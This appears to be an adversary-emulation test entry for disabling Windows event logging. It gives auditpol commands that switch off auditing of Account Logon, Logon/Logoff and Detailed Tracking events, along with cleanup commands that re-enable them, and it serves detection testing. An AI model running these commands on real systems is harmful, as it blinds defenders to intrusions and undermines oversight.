#TechniqueName: Impair Defenses: Disable Windows Event Logging
#AtomicTestName: Impair Windows Audit Log Policy
#Language: cmd

#commands
auditpol /set /category:"Account Logon" /success:disable /failure:disable
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable
auditpol /set /category:"Detailed Tracking" /success:disable


#cleanup_commands
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable

